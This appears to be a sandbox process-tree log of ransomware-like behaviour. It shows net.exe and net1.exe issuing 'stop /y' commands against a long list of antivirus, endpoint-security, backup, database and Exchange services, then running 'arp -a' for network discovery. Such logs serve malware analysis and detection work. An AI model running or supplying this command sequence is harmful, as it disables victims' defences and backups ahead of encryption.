-
-
C:\Windows\system32\net.exe"net.exe" stop mfewc /y2⤵PID:1264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:3636
-
-
-
C:\Windows\system32\net.exe"net.exe" stop avpsus /y2⤵PID:956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:3620
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵PID:912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵PID:3820
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EhttpSrv /y2⤵PID:1952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵PID:5100
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MMS /y2⤵PID:1372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵PID:3812
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵PID:1808
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵PID:3836
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ekrn /y2⤵PID:1376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵PID:3508
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mozyprobackup /y2⤵PID:1080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵PID:5936
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:1720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:3848
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:1708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:5920
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ccSetMgr /y2⤵PID:1740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:3744
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SavRoam /y2⤵PID:1780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:3400
-
-
-
C:\Windows\system32\net.exe"net.exe" stop RTVscan /y2⤵PID:1568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:5108
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:3860
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:3828
-
-
-
C:\Windows\system32\net.exe"net.exe" stop DefWatch /y2⤵PID:1604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:3892
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:2072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:2156
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵PID:2100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵PID:3876
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EPSecurityService /y2⤵PID:2124
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵PID:3716
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:2148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:3692
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPS /y2⤵PID:2172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵PID:3656
-
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y2⤵PID:2196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:3804
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBFCService /y2⤵PID:2232
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:4704
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:2256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:4868
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EPUpdateService /y2⤵PID:2280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵PID:5044
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ntrtscan /y2⤵PID:2304
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵PID:5036
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵PID:2328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵PID:5052
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EsgShKernel /y2⤵PID:2348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵PID:5060
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SDRSVC /y2⤵PID:2376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵PID:5084
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵PID:2400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵PID:5068
-
-
-
C:\Windows\system32\net.exe"net.exe" stop FA_Scheduler /y2⤵PID:2424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵PID:4408
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:2464
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:4416
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBIDPService /y2⤵PID:2524
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:4888
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:2572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:5512
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:2544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:4904
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:2512
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:4936
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:2500
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:4668
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooBackup /y2⤵PID:2604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:4880
-
-
-
C:\Windows\system32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:2648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:4956
-
-
-
C:\Windows\system32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:2676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:4428
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooIT /y2⤵PID:2628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:4964
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵PID:2300
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵PID:5008
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLWriter /y2⤵PID:2276
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵PID:6384
-
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFS /y2⤵PID:2252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵PID:2960
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵PID:2228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵PID:5800
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵PID:3008
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵PID:4536
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵PID:3000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵PID:5716
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵PID:2992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y3⤵PID:5644
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵PID:2984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y3⤵PID:4788
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMTA /y2⤵PID:2976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵PID:4692
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SstpSvc /y2⤵PID:2968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵PID:4544
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msftesql$PROD /y2⤵PID:2960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵PID:4820
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵PID:2952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y3⤵PID:4632
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:2944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵PID:4732
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SMTPSvc /y2⤵PID:2936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵PID:4652
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵PID:2928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y3⤵PID:4740
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMGMT /y2⤵PID:2920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵PID:4764
-
-
-
C:\Windows\system32\net.exe"net.exe" stop POP3Svc /y2⤵PID:2912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵PID:5000
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer110 /y2⤵PID:2904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵PID:4504
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵PID:2896
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y3⤵PID:5016
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer /y2⤵PID:2888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵PID:5008
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SamSs /y2⤵PID:2880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵PID:6600
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵PID:2872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵PID:4456
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeIS /y2⤵PID:2864
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵PID:2156
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetMsmqActivator /y2⤵PID:2856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵PID:2220
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer100 /y2⤵PID:2848
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵PID:5096
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQL Backups /y2⤵PID:2836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y3⤵PID:6132
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵PID:2828
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y3⤵PID:5756
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EraserSvc11710 /y2⤵PID:2820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵PID:2432
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Agent” /y2⤵PID:2812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y3⤵PID:4856
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeES /y2⤵PID:2804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵PID:4464
-
-
-
C:\Windows\system32\net.exe"net.exe" stop IISAdmin /y2⤵PID:2796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵PID:3800
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer /y2⤵PID:2788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵PID:4760
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵PID:2780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y3⤵PID:4496
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sophos /y2⤵PID:2772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:6140
-
-
-
C:\Windows\system32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:2764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:1728
-
-
-
C:\Windows\system32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:2756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:3740
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:2748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:4608
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:2740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:6124
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:2732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:4664
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:2724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:2460
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:2716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:4568
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:2708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:2344
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:2700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:4576
-
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFSGT /y2⤵PID:2344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵PID:3504
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:2356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:4544
-
-
-
C:\Windows\system32\net.exe"net.exe" stop UI0Detect /y2⤵PID:2392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵PID:3680
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSA /y2⤵PID:2220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵PID:5940
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ESHASRV /y2⤵PID:2420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵PID:2940
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵PID:2452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y3⤵PID:2316
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPS /y2⤵PID:2204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵PID:4568
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSRS /y2⤵PID:2432
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵PID:2388
-
-
-
C:\Windows\system32\net.exe"net.exe" stop W3Svc /y2⤵PID:1712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵PID:2740
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵PID:776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵PID:3576
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Health Service” /y2⤵PID:1980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y3⤵PID:7068
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵PID:1536
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y3⤵PID:6392
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵PID:1924
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵PID:5284
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵PID:2488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y3⤵PID:4456
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPS /y2⤵PID:2520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵PID:2780
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵PID:2644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵PID:5100
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:2636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:2900
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵PID:2664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y3⤵PID:7080
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵PID:2580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵PID:2128
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeadtopology /y2⤵PID:2568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y3⤵PID:4852
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵PID:2560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵PID:7048
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeimap4 /y2⤵PID:2508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵PID:6724
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵PID:2532
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y3⤵PID:7152
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ARSM /y2⤵PID:3076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵PID:424
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵PID:3084
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵PID:4496
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵PID:3132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y3⤵PID:7088
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLSERVER /y2⤵PID:3180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵PID:5808
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵PID:3204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵PID:6296
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵PID:3228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵PID:3664
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵PID:3252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵PID:6944
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MySQL57 /y2⤵PID:3276
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵PID:7096
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MySQL80 /y2⤵PID:3300
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵PID:3796
-
-
-
C:\Windows\system32\net.exe"net.exe" stop OracleClientCache80 /y2⤵PID:3324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵PID:5592
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:3348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵PID:6564
-
-
-
C:\Windows\system32\net.exe"net.exe" stop RESvc /y2⤵PID:3372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y3⤵PID:7128
-
-
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y2⤵PID:3364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:6584
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfemms /y2⤵PID:3356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵PID:1664
-
-
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y2⤵PID:3340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:3476
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfefire /y2⤵PID:3332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵PID:7144
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:3316
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:3252
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McTaskManager /y2⤵PID:3308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵PID:3676
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamRESTSvc /y2⤵PID:3292
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵PID:7136
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McShield /y2⤵PID:3284
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵PID:7120
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:3268
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:6944
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵PID:3260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵PID:7160
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamMountSvc /y2⤵PID:3244
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵PID:2300
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFramework /y2⤵PID:3236
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵PID:6700
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵PID:3220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵PID:6392
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeEngineService /y2⤵PID:3212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵PID:2988
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵PID:3196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵PID:4544
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MBEndpointAgent /y2⤵PID:3188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵PID:7112
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploySvc /y2⤵PID:3172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵PID:1536
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MBAMService /y2⤵PID:3164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵PID:3900
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵PID:3156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵PID:6312
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:3148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:7104
-
-
-
C:\Windows\system32\net.exe"net.exe" stop masvc /y2⤵PID:3140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵PID:4684
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCloudSvc /y2⤵PID:3124
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵PID:2508
-
-
-
C:\Windows\system32\net.exe"net.exe" stop macmnsvc /y2⤵PID:3116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵PID:2392
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵PID:3108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵PID:6320
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Message Router” /y2⤵PID:3100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵PID:3772
-
-
-
C:\Windows\system32\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵PID:3092
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵PID:3580
-
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵PID:3676
-
-
